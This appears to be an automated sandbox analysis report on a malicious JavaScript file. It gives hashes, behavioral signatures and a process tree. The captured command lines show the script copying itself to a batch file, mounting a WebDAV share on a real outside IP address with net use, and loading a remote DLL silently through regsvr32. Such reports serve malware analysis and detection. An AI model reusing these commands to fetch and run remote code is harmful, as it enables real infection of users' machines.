Analysis
  max time kernel: 122s
  max time network: 125s
  platform: windows7_x64
  resource: win7-20240708-en
  resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted: 11/07/2024, 09:26
Static task: static1
Behavioral task: behavioral1
  Sample: 155945859957932489.js
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: 155945859957932489.js
  Resource: win10v2004-20240709-en
General
  Target: 155945859957932489.js
  Size: 5KB
  MD5: 02db4fd1a39cf089e9ed8e1c21a6d26e
  SHA1: 49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
  SHA256: 522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
  SHA512: 9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad
  SSDEEP: 96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka
Malware Config
Signatures
  Command and Scripting Interpreter: JavaScript (1 TTPs)
  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  Runs net.exe
  Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
    pid    Process
    2764   regsvr32.exe
  Suspicious use of WriteProcessMemory (11 IoCs)
    description                         pid    Process       procid_target
    PID 2412 wrote to memory of 1544    2412   wscript.exe   30
    PID 2412 wrote to memory of 1544    2412   wscript.exe   30
    PID 2412 wrote to memory of 1544    2412   wscript.exe   30
    PID 1544 wrote to memory of 2620    1544   cmd.exe       32
    PID 1544 wrote to memory of 2620    1544   cmd.exe       32
    PID 1544 wrote to memory of 2620    1544   cmd.exe       32
    PID 1544 wrote to memory of 2764    1544   cmd.exe       33
    PID 1544 wrote to memory of 2764    1544   cmd.exe       33
    PID 1544 wrote to memory of 2764    1544   cmd.exe       33
    PID 1544 wrote to memory of 2764    1544   cmd.exe       33
    PID 1544 wrote to memory of 2764    1544   cmd.exe       33
Processes
  C:\Windows\system32\wscript.exe
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js
    Suspicious use of WriteProcessMemory
    PID: 2412
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"
      Suspicious use of WriteProcessMemory
      PID: 1544
      C:\Windows\system32\net.exe
        Command line: net use \\45.9.74.13@8888\DavWWWRoot\
        PID: 2620
      C:\Windows\system32\regsvr32.exe
        Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID: 2764
Network
MITRE ATT&CK Enterprise v15
Downloads
  Filesize: 5KB
  MD5: 02db4fd1a39cf089e9ed8e1c21a6d26e
  SHA1: 49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
  SHA256: 522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
  SHA512: 9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad